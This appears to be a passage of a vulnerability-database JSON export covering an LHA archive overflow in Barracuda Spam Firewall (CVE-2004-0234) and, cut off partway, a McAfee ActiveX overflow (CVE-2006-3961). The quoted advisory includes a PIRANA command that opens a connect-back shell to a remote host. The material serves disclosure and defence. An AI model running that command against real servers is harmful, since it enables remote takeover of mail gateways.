hardware and software solution for\ncomplete protection of your email server. It provides a powerful, easy to use,\nand affordable solution to eliminating spam and virus from your organization by\nproviding the following protection:\n\n * Anti-spam\n * Anti-virus\n * Anti-spoofing\n * Anti-phishing\n * Anti-spyware (Attachments)\n * Denial of Service\n\n\nII. DESCRIPTION\n\nWhen building a special LHA archive with long filenames in it, it is possible to\noverflow a buffer on the stack used by the program and seize control of the\nprogram. \n\nSince this component is used when scanning an incoming email, remote compromise\nis possible by sending a simple email with the specially crafted LHA archive\nattached to the Barracuda Spam Firewall. \n\nYou do NOT need to have remote administration access (on port 8000) for\nsuccessfull exploitation. \n\nFor further informations about the details of the bugs, you can consult OSVDB\n#5753 and #5754 . \n\n\nIII. IMPACT\n\nGain shell access to the remote Barracuda Spam Firewall\n\n\nIV. PROOF OF CONCEPT\n\nUsing the PIRANA framework, available at http://www.guay-leroux.com , it is\npossible to test the Barracuda Spam Firewall against the LHA vulnerability. \n\nBy calling PIRANA the way it is described below, you will get a TCP connect back\nshell on IP address 1.2.3.4 and port 1234:\n\nperl pirana.pl -e 0 -h barracuda.vulnerable.com -a postmaster -s 0 -l 1.2.3.4 \\\n-p 1234 -z -c 1 -d 1\n\n\nV. SOLUTION\n\nBarracuda Networks pushed an urgent critical patch in spamdef #3.0.10045,\navailable March 24th 2006. \n\nThey also published an official patch in firmware #3.3.03.022, available April\n3rd 2006. \n\nIt is recommended to update to firmware #3.3.03.022 . \n\n\nVI. CREDITS\n\nUlf Harnhammar who found the original LHA flaw. \n\nJean-S\\xe9bastien Guay-Leroux who conducted further research on the bug\nand produced exploitation plugin for the PIRANA framework. \n\n\nVII. REFERENCES\n\nhttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0234\n\n\nVIII. HISTORY\n\n2006-03-02 : Disclosure of vulnerability to Barracuda Networks\n2006-03-02 : Acknowledgement of the problem\n2006-03-24 : Problem fixed\n2006-04-03 : Advisory disclosed to public\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2004-0234"
},
{
"db": "JVNDB",
"id": "JVNDB-2004-000169"
},
{
"db": "BID",
"id": "10243"
},
{
"db": "VULHUB",
"id": "VHN-8664"
},
{
"db": "PACKETSTORM",
"id": "45159"
},
{
"db": "PACKETSTORM",
"id": "33241"
},
{
"db": "PACKETSTORM",
"id": "44104"
},
{
"db": "PACKETSTORM",
"id": "45164"
}
],
"trust": 2.34
},
"exploit_availability": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"reference": "https://www.scap.org.cn/vuln/vhn-8664",
"trust": 0.1,
"type": "unknown"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-8664"
}
]
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2004-0234",
"trust": 3.0
},
{
"db": "BID",
"id": "10243",
"trust": 2.8
},
{
"db": "OSVDB",
"id": "5754",
"trust": 2.5
},
{
"db": "OSVDB",
"id": "5753",
"trust": 2.5
},
{
"db": "SECTRACK",
"id": "1015866",
"trust": 2.5
},
{
"db": "SECUNIA",
"id": "19514",
"trust": 1.8
},
{
"db": "VUPEN",
"id": "ADV-2006-1220",
"trust": 1.7
},
{
"db": "XF",
"id": "16012",
"trust": 1.4
},
{
"db": "JVNDB",
"id": "JVNDB-2004-000169",
"trust": 0.8
},
{
"db": "FULLDISC",
"id": "20040501 LHA BUFFER OVERFLOWS AND DIRECTORY TRAVERSAL PROBLEMS",
"trust": 0.6
},
{
"db": "FULLDISC",
"id": "20040502 LHA LOCAL STACK OVERFLOW PROOF OF CONCEPT CODE",
"trust": 0.6
},
{
"db": "FEDORA",
"id": "FEDORA-2004-119",
"trust": 0.6
},
{
"db": "FEDORA",
"id": "FLSA:1833",
"trust": 0.6
},
{
"db": "REDHAT",
"id": "RHSA-2004:179",
"trust": 0.6
},
{
"db": "REDHAT",
"id": "RHSA-2004:178",
"trust": 0.6
},
{
"db": "BUGTRAQ",
"id": "20060403 BARRACUDA LHA ARCHIVER SECURITY BUG LEADS TO REMOTE COMPROMISE",
"trust": 0.6
},
{
"db": "BUGTRAQ",
"id": "20040510 [ULF HARNHAMMAR]: LHA ADVISORY + PATCH",
"trust": 0.6
},
{
"db": "OVAL",
"id": "OVAL:ORG.MITRE.OVAL:DEF:977",
"trust": 0.6
},
{
"db": "OVAL",
"id": "OVAL:ORG.MITRE.OVAL:DEF:9881",
"trust": 0.6
},
{
"db": "GENTOO",
"id": "GLSA-200405-02",
"trust": 0.6
},
{
"db": "DEBIAN",
"id": "DSA-515",
"trust": 0.6
},
{
"db": "CONECTIVA",
"id": "CLA-2004:840",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-200408-202",
"trust": 0.6
},
{
"db": "PACKETSTORM",
"id": "33241",
"trust": 0.2
},
{
"db": "VULHUB",
"id": "VHN-8664",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "45159",
"trust": 0.1
},
{
"db": "SECUNIA",
"id": "19002",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "44104",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "45164",
"trust": 0.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-8664"
},
{
"db": "BID",
"id": "10243"
},
{
"db": "JVNDB",
"id": "JVNDB-2004-000169"
},
{
"db": "PACKETSTORM",
"id": "45159"
},
{
"db": "PACKETSTORM",
"id": "33241"
},
{
"db": "PACKETSTORM",
"id": "44104"
},
{
"db": "PACKETSTORM",
"id": "45164"
},
{
"db": "CNNVD",
"id": "CNNVD-200408-202"
},
{
"db": "NVD",
"id": "CVE-2004-0234"
}
]
},
"id": "VAR-200408-0140",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-8664"
}
],
"trust": 0.01
},
"last_update_date": "2024-08-14T12:26:28.416000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "LHA for UNIX Version 1.17",
"trust": 0.8,
"url": "http://www.infor.kanazawa-it.ac.jp/~ishii/lhaunix/"
},
{
"title": "Top Page",
"trust": 0.8,
"url": "http://lha.sourceforge.jp/"
},
{
"title": "RHSA-2004:178",
"trust": 0.8,
"url": "https://rhn.redhat.com/errata/RHSA-2004-178.html"
},
{
"title": "RHSA-2004:179",
"trust": 0.8,
"url": "https://rhn.redhat.com/errata/RHSA-2004-179.html"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2004-000169"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-119",
"trust": 1.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-8664"
},
{
"db": "NVD",
"id": "CVE-2004-0234"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.5,
"url": "http://www.securityfocus.com/bid/10243"
},
{
"trust": 2.5,
"url": "http://securitytracker.com/id?1015866"
},
{
"trust": 2.0,
"url": "http://www.redhat.com/archives/fedora-announce-list/2004-may/msg00005.html"
},
{
"trust": 1.8,
"url": "http://marc.info/?l=bugtraq\u0026m=108422737918885\u0026w=2"
},
{
"trust": 1.7,
"url": "http://archives.neohapsis.com/archives/bugtraq/2006-04/0059.html"
},
{
"trust": 1.7,
"url": "http://www.debian.org/security/2004/dsa-515"
},
{
"trust": 1.7,
"url": "https://bugzilla.fedora.us/show_bug.cgi?id=1833"
},
{
"trust": 1.7,
"url": "http://lists.grok.org.uk/pipermail/full-disclosure/2004-may/020776.html"
},
{
"trust": 1.7,
"url": "http://lists.grok.org.uk/pipermail/full-disclosure/2004-may/020778.html"
},
{
"trust": 1.7,
"url": "http://security.gentoo.org/glsa/glsa-200405-02.xml"
},
{
"trust": 1.7,
"url": "http://www.guay-leroux.com/projects/barracuda-advisory-lha.txt"
},
{
"trust": 1.7,
"url": "http://www.osvdb.org/5753"
},
{
"trust": 1.7,
"url": "http://www.osvdb.org/5754"
},
{
"trust": 1.7,
"url": "http://www.redhat.com/support/errata/rhsa-2004-178.html"
},
{
"trust": 1.7,
"url": "http://www.redhat.com/support/errata/rhsa-2004-179.html"
},
{
"trust": 1.7,
"url": "http://secunia.com/advisories/19514"
},
{
"trust": 1.6,
"url": "http://distro.conectiva.com.br/atualizacoes/?id=a\u0026anuncio=000840"
},
{
"trust": 1.4,
"url": "http://www.frsirt.com/english/advisories/2006/1220"
},
{
"trust": 1.4,
"url": "http://xforce.iss.net/xforce/xfdb/16012"
},
{
"trust": 1.4,
"url": "http://oval.mitre.org/repository/data/getdef?id=oval:org.mitre.oval:def:977"
},
{
"trust": 1.1,
"url": "https://oval.cisecurity.org/repository/search/definition/oval%3aorg.mitre.oval%3adef%3a977"
},
{
"trust": 1.1,
"url": "https://oval.cisecurity.org/repository/search/definition/oval%3aorg.mitre.oval%3adef%3a9881"
},
{
"trust": 1.1,
"url": "http://www.vupen.com/english/advisories/2006/1220"
},
{
"trust": 1.1,
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/16012"
},
{
"trust": 0.9,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2004-0234"
},
{
"trust": 0.8,
"url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2004-0234"
},
{
"trust": 0.8,
"url": "http://osvdb.org/5753"
},
{
"trust": 0.8,
"url": "http://osvdb.org/5754"
},
{
"trust": 0.6,
"url": "http://marc.theaimsgroup.com/?l=bugtraq\u0026m=108422737918885\u0026w=2"
},
{
"trust": 0.6,
"url": "http://oval.mitre.org/repository/data/getdef?id=oval:org.mitre.oval:def:9881"
},
{
"trust": 0.4,
"url": "http://www.infor.kanazawa-it.ac.jp/~ishii/lhaunix/"
},
{
"trust": 0.3,
"url": "http://www.barracudanetworks.com/ns/products/spam_overview.php"
},
{
"trust": 0.3,
"url": "http://www.stalker.com/cgpmcafee/"
},
{
"trust": 0.3,
"url": "http://www.f-secure.com/security/fsc-2004-1.shtml"
},
{
"trust": 0.3,
"url": "http://mail.stalker.com/lists/cgatepro/message/61244.html"
},
{
"trust": 0.3,
"url": "http://images.mcafee.com/misc/mcafee_security_bulletin_05-march-17.pdf"
},
{
"trust": 0.3,
"url": "http://rhn.redhat.com/errata/rhsa-2004-178.html"
},
{
"trust": 0.3,
"url": "http://rhn.redhat.com/errata/rhsa-2004-219.html"
},
{
"trust": 0.3,
"url": "http://www.rarsoft.com/"
},
{
"trust": 0.3,
"url": "http://www.winzip.com/"
},
{
"trust": 0.3,
"url": "/archive/1/366265"
},
{
"trust": 0.2,
"url": "http://secunia.com/secunia_security_advisories/"
},
{
"trust": 0.2,
"url": "http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org"
},
{
"trust": 0.2,
"url": "http://secunia.com/about_secunia_advisories/"
},
{
"trust": 0.2,
"url": "http://secunia.com/advisories/19002/"
},
{
"trust": 0.1,
"url": "http://marc.info/?l=bugtraq\u0026amp;m=108422737918885\u0026amp;w=2"
},
{
"trust": 0.1,
"url": "http://distro.conectiva.com.br/atualizacoes/?id=a\u0026amp;anuncio=000840"
},
{
"trust": 0.1,
"url": "http://lists.grok.org.uk/pipermail/full-disclosure/2006-april/044875.html"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/4639/"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/19514/"
},
{
"trust": 0.1,
"url": "http://lists.grok.org.uk/pipermail/full-disclosure/2006-april/044874.html"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/11510/"
},
{
"trust": 0.1,
"url": "http://shellcode.org/audit/"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2004-0234"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2004-0235"
},
{
"trust": 0.1,
"url": "http://idiosynkratisk.tk/"
},
{
"trust": 0.1,
"url": "http://www.advogato.org/person/metaur/"
},
{
"trust": 0.1,
"url": "http://www2m.biglobe.ne.jp/~dolphin/lha/lha.htm"
},
{
"trust": 0.1,
"url": "http://www2m.biglobe.ne.jp/~dolphin/lha/prog/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/8297/"
},
{
"trust": 0.1,
"url": "http://www.guay-leroux.com/projects/zoo-advisory.txt"
},
{
"trust": 0.1,
"url": "http://www.barracudanetworks.com/"
},
{
"trust": 0.1,
"url": "http://www.guay-leroux.com"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-8664"
},
{
"db": "BID",
"id": "10243"
},
{
"db": "JVNDB",
"id": "JVNDB-2004-000169"
},
{
"db": "PACKETSTORM",
"id": "45159"
},
{
"db": "PACKETSTORM",
"id": "33241"
},
{
"db": "PACKETSTORM",
"id": "44104"
},
{
"db": "PACKETSTORM",
"id": "45164"
},
{
"db": "CNNVD",
"id": "CNNVD-200408-202"
},
{
"db": "NVD",
"id": "CVE-2004-0234"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "VULHUB",
"id": "VHN-8664"
},
{
"db": "BID",
"id": "10243"
},
{
"db": "JVNDB",
"id": "JVNDB-2004-000169"
},
{
"db": "PACKETSTORM",
"id": "45159"
},
{
"db": "PACKETSTORM",
"id": "33241"
},
{
"db": "PACKETSTORM",
"id": "44104"
},
{
"db": "PACKETSTORM",
"id": "45164"
},
{
"db": "CNNVD",
"id": "CNNVD-200408-202"
},
{
"db": "NVD",
"id": "CVE-2004-0234"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2004-08-18T00:00:00",
"db": "VULHUB",
"id": "VHN-8664"
},
{
"date": "2004-04-30T00:00:00",
"db": "BID",
"id": "10243"
},
{
"date": "2008-05-21T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2004-000169"
},
{
"date": "2006-04-04T19:25:51",
"db": "PACKETSTORM",
"id": "45159"
},
{
"date": "2004-05-04T04:25:06",
"db": "PACKETSTORM",
"id": "33241"
},
{
"date": "2006-02-25T00:55:07",
"db": "PACKETSTORM",
"id": "44104"
},
{
"date": "2006-04-04T19:39:53",
"db": "PACKETSTORM",
"id": "45164"
},
{
"date": "2004-04-30T00:00:00",
"db": "CNNVD",
"id": "CNNVD-200408-202"
},
{
"date": "2004-08-18T04:00:00",
"db": "NVD",
"id": "CVE-2004-0234"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2017-10-11T00:00:00",
"db": "VULHUB",
"id": "VHN-8664"
},
{
"date": "2009-07-12T04:07:00",
"db": "BID",
"id": "10243"
},
{
"date": "2008-05-21T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2004-000169"
},
{
"date": "2007-05-22T00:00:00",
"db": "CNNVD",
"id": "CNNVD-200408-202"
},
{
"date": "2017-10-11T01:29:24.730000",
"db": "NVD",
"id": "CVE-2004-0234"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "PACKETSTORM",
"id": "45164"
},
{
"db": "CNNVD",
"id": "CNNVD-200408-202"
}
],
"trust": 0.7
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "LHa Vuffer Overflow Vulnerability in Testing and Extracting Process",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2004-000169"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "buffer overflow",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200408-202"
}
],
"trust": 0.6
}
}
var-200608-0456
Vulnerability from variot
Buffer overflow in McSubMgr ActiveX control (mcsubmgr.dll) in McAfee Security Center 6.0.23 for Internet Security Suite 2006, Wireless Home Network Security, Personal Firewall Plus, VirusScan, Privacy Service, SpamKiller, AntiSpyware, and QuickClean allows remote user-assisted attackers to execute arbitrary commands via long string parameters, which are later used in vsprintf. McAfee SecurityCenter is prone to a stack-based buffer-overflow vulnerability. This vulnerability requires a certain amount of user-interaction for an attack to occur, such as visiting a malicious website. A successful exploit would let a remote attacker execute code with the privileges of the currently logged in user. This issue is reported to affect versions 4.3 through 6.0.22. Please see the affected packages section for a list of McAfee consumer products that ship with vulnerable versions of the McAfee SecurityCenter. McAfee Subscription Manager (McAfee Subscription Manager) is a component released together with many McAfee products to manage product permissions. It is an ActiveX control, through which manufacturers can check the legality of product use. McSubMgr.dll, the implementation module of the product inspection manager, does not check the length of the incoming parameters. Remote attackers can lure users to visit malicious websites, and transmit data exceeding 3000 bytes to McSubMgr.dll in web scripts, resulting in stack overflow. to execute arbitrary commands. Link: http://www.securityfocus.com/archive/1/442495/30/0/threaded.
Hardcore Disassembler / Reverse Engineer Wanted!
Want to work with IDA and BinDiff? Want to write PoC's and Exploits?
Your nationality is not important. We will get you a work permit, find an apartment, and offer a relocation compensation package.
The vulnerability is caused due to an unspecified error and allows execution of arbitrary code. No more information is currently available.
SOLUTION: Sufficient information about the vulnerability is not available to suggest a proper workaround.
PROVIDED AND/OR DISCOVERED BY: eEye Digital Security
ORIGINAL ADVISORY: eEye Digital Security: http://www.eeye.com/html/research/upcoming/20060719.html
About: This Advisory was delivered by Secunia as a free service to help everybody keeping their systems up to date against the latest vulnerabilities.
Subscribe: http://secunia.com/secunia_security_advisories/
Definitions: (Criticality, Where etc.) http://secunia.com/about_secunia_advisories/
Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor.
Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-200608-0456",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "internet security suite",
"scope": "eq",
"trust": 2.4,
"vendor": "mcafee",
"version": "2006"
},
{
"model": "privacy service",
"scope": "eq",
"trust": 1.9,
"vendor": "mcafee",
"version": "2005"
},
{
"model": "privacy service",
"scope": "eq",
"trust": 1.9,
"vendor": "mcafee",
"version": "2004"
},
{
"model": "personal firewall plus",
"scope": "eq",
"trust": 1.9,
"vendor": "mcafee",
"version": "2006"
},
{
"model": "personal firewall plus",
"scope": "eq",
"trust": 1.9,
"vendor": "mcafee",
"version": "2005"
},
{
"model": "personal firewall plus",
"scope": "eq",
"trust": 1.9,
"vendor": "mcafee",
"version": "2004"
},
{
"model": "internet security suite",
"scope": "eq",
"trust": 1.9,
"vendor": "mcafee",
"version": "2005"
},
{
"model": "internet security suite",
"scope": "eq",
"trust": 1.9,
"vendor": "mcafee",
"version": "2004"
},
{
"model": "antispyware",
"scope": "eq",
"trust": 1.9,
"vendor": "mcafee",
"version": "2006"
},
{
"model": "antispyware",
"scope": "eq",
"trust": 1.9,
"vendor": "mcafee",
"version": "2005"
},
{
"model": "wireless home network security",
"scope": "eq",
"trust": 1.3,
"vendor": "mcafee",
"version": "2006"
},
{
"model": "virusscan",
"scope": "eq",
"trust": 1.3,
"vendor": "mcafee",
"version": "2006"
},
{
"model": "virusscan",
"scope": "eq",
"trust": 1.3,
"vendor": "mcafee",
"version": "2005"
},
{
"model": "virusscan",
"scope": "eq",
"trust": 1.3,
"vendor": "mcafee",
"version": "2004"
},
{
"model": "quickclean",
"scope": "eq",
"trust": 1.3,
"vendor": "mcafee",
"version": "2006"
},
{
"model": "quickclean",
"scope": "eq",
"trust": 1.3,
"vendor": "mcafee",
"version": "2005"
},
{
"model": "quickclean",
"scope": "eq",
"trust": 1.3,
"vendor": "mcafee",
"version": "2004"
},
{
"model": "privacy service",
"scope": "eq",
"trust": 1.3,
"vendor": "mcafee",
"version": "2006"
},
{
"model": "spamkiller",
"scope": "eq",
"trust": 1.0,
"vendor": "mcafee",
"version": "5.0"
},
{
"model": "security center",
"scope": "eq",
"trust": 1.0,
"vendor": "mcafee",
"version": "6.0"
},
{
"model": "spamkiller",
"scope": "eq",
"trust": 1.0,
"vendor": "mcafee",
"version": "6.0"
},
{
"model": "security center",
"scope": "eq",
"trust": 1.0,
"vendor": "mcafee",
"version": "6.0.22"
},
{
"model": "spamkiller",
"scope": "eq",
"trust": 1.0,
"vendor": "mcafee",
"version": "7.0"
},
{
"model": "security center",
"scope": "eq",
"trust": 1.0,
"vendor": "mcafee",
"version": "6.0.23"
},
{
"model": "security center",
"scope": "eq",
"trust": 1.0,
"vendor": "mcafee",
"version": "4.3"
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "mcafee",
"version": null
},
{
"model": "antispyware",
"scope": null,
"trust": 0.8,
"vendor": "mcafee",
"version": null
},
{
"model": "personal firewall plus",
"scope": null,
"trust": 0.8,
"vendor": "mcafee",
"version": null
},
{
"model": "privacy service",
"scope": null,
"trust": 0.8,
"vendor": "mcafee",
"version": null
},
{
"model": "quickclean",
"scope": null,
"trust": 0.8,
"vendor": "mcafee",
"version": null
},
{
"model": "securitycenter",
"scope": "eq",
"trust": 0.8,
"vendor": "mcafee",
"version": "6.0.23"
},
{
"model": "spamkiller",
"scope": null,
"trust": 0.8,
"vendor": "mcafee",
"version": null
},
{
"model": "virusscan",
"scope": null,
"trust": 0.8,
"vendor": "mcafee",
"version": null
},
{
"model": "wireless home network security",
"scope": null,
"trust": 0.8,
"vendor": "mcafee",
"version": null
},
{
"model": "spamkiller",
"scope": "eq",
"trust": 0.3,
"vendor": "mcafee",
"version": "2006"
},
{
"model": "spamkiller",
"scope": "eq",
"trust": 0.3,
"vendor": "mcafee",
"version": "2005"
},
{
"model": "spamkiller",
"scope": "eq",
"trust": 0.3,
"vendor": "mcafee",
"version": "2004"
},
{
"model": "securitycenter",
"scope": "eq",
"trust": 0.3,
"vendor": "mcafee",
"version": "6.0.22"
},
{
"model": "securitycenter",
"scope": "eq",
"trust": 0.3,
"vendor": "mcafee",
"version": "6.0"
},
{
"model": "securitycenter",
"scope": "eq",
"trust": 0.3,
"vendor": "mcafee",
"version": "4.3"
},
{
"model": "internet security suite",
"scope": "eq",
"trust": 0.3,
"vendor": "mcafee",
"version": "20060"
},
{
"model": "securitycenter",
"scope": "ne",
"trust": 0.3,
"vendor": "mcafee",
"version": "7.0"
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#481212"
},
{
"db": "BID",
"id": "19265"
},
{
"db": "JVNDB",
"id": "JVNDB-2006-001904"
},
{
"db": "CNNVD",
"id": "CNNVD-200608-011"
},
{
"db": "NVD",
"id": "CVE-2006-3961"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/a:mcafee:antispyware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/a:mcafee:internet_security_suite",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/a:mcafee:personal_firewall_plus",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/a:mcafee:privacy_service",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/a:mcafee:quickclean",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/a:mcafee:security_center",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/a:mcafee:spamkiller",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/a:mcafee:virusscan",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/a:mcafee:wireless_home_network_security",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2006-001904"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Discovered by eEye Digital Security.",
"sources": [
{
"db": "BID",
"id": "19265"
}
],
"trust": 0.3
},
"cve": "CVE-2006-3961",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "PARTIAL",
"baseScore": 6.8,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 8.6,
"id": "CVE-2006-3961",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 1.8,
"vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "PARTIAL",
"baseScore": 6.8,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 8.6,
"id": "VHN-20069",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.1,
"vectorString": "AV:N/AC:M/AU:N/C:P/I:P/A:P",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2006-3961",
"trust": 1.0,
"value": "MEDIUM"
},
{
"author": "CARNEGIE MELLON",
"id": "VU#481212",
"trust": 0.8,
"value": "19.74"
},
{
"author": "NVD",
"id": "CVE-2006-3961",
"trust": 0.8,
"value": "Medium"
},
{
"author": "CNNVD",
"id": "CNNVD-200608-011",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "VULHUB",
"id": "VHN-20069",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#481212"
},
{
"db": "VULHUB",
"id": "VHN-20069"
},
{
"db": "JVNDB",
"id": "JVNDB-2006-001904"
},
{
"db": "CNNVD",
"id": "CNNVD-200608-011"
},
{
"db": "NVD",
"id": "CVE-2006-3961"
}
]
},
"description": {
"@context": {
